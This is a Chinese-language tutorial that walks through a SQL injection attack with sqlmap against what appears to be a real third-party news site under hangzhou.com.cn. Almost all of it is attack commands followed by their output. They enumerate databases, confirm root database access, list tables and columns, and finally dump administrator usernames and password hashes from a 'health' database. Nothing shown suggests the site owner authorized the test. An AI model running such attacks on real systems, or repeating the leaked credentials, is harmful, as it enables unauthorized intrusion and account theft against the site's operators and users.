╭──────────────────────────╮
  猫客工作室--真诚、高效、创新，敢想敢做努力做到最好！ 
╰──────────────────────────╯

>讲师名称：剑眉大侠（QQ767501681）

>动画名称：使用SqlMap进行Mysql注入



注入点：http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5


获取所有数据库名称
sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --dbs

available databases [19]:
[*] aixing
[*] bus
[*] dedecmsv56gbk
[*] dedecmsv57gbk
[*] discuz7
[*] drupal72
[*] health
[*] hzbbs
[*] hzmall
[*] information_schema
[*] iweibo2
[*] man
[*] mlyask
[*] mysql
[*] newmall
[*] test
[*] ucenter
[*] xiaobaige
[*] xjzblog


获取当前数据库名称
sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --current-db

current database:    'health'



获取当前用户名称
sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --current-user

current user:    'root@localhost'

物理路径
off

站库分离


获取全部表段

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --tables -D health



[36 tables]
+---------------------+
| hl_admin            |
| hl_admintype        |
| hl_area             |
| hl_attachments      |
| hl_attachmenttypes  |
| hl_bespeak          |
| hl_bespeak_sign     |
| hl_bespoken         |
| hl_categories       |
| hl_comments         |
| hl_disease          |
| hl_doctor           |
| hl_hospital         |
| hl_indexpic         |
| hl_indexpiccate     |
| hl_items            |
| hl_items_new        |
| hl_jkzsds           |
| hl_jkzsds2_answer   |
| hl_jkzsds2_news     |
| hl_jkzsds2_question |
| hl_jkzsds2_school   |
| hl_jkzsds2_survey   |
| hl_jkzsds_hi        |
| hl_jkzsds_hi_bak    |
| hl_jkzsds_hi_bak1   |
| hl_jkzsds_new       |
| hl_jkzsds_tmp       |
| hl_question         |
| hl_section          |
| hl_shop             |
| hl_tag              |
| hl_tags             |
| hl_womandao         |
| hl_womandao_cate    |
| hl_womandao_pic     |
+---------------------+

获取全部字段
sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --columns -T hl_admin -D health

+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| adminid    | smallint(6) unsigned |
| email      | varchar(50)          |
| loginip    | varchar(20)          |
| logintime  | int(11)              |
| logintimes | int(11) unsigned     |
| name       | varchar(30)          |
| password   | varchar(32)          |
| status     | enum('1','2')        |
| username   | varchar(30)          |
| usertype   | smallint(6) unsigned |
+------------+----------------------+




获取字段内容
sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --dump -C username,password  -T hl_admin -D health

username,password

+--------------------------+------------+
| password                 | username   |
+--------------------------+------------+
| 76419c58730d9f35de7ac538 | admin      |
| 21218cca77804d2ba1922c33 | nvxing     |
| 183b95c41222849a39a1cbf5 | SmokingBan |
| e10adc3949ba59abbe56e057 | meijie     |
| e10adc3949ba59abbe56e057 | benqktc    |
| e10adc3949ba59abbe56e057 | mon        |
+--------------------------+------------+




更多命令运用：
http://wenku.baidu.com/link?url=eMzrblqUDfXDaosGNkAKnthsT4AA79BEgd5XUnD624yqefBbHaqZk-lVx3pns2M6tApuP7bbNYpPTHGBgiCxdutlUKFGtdmJj80usI2nBuS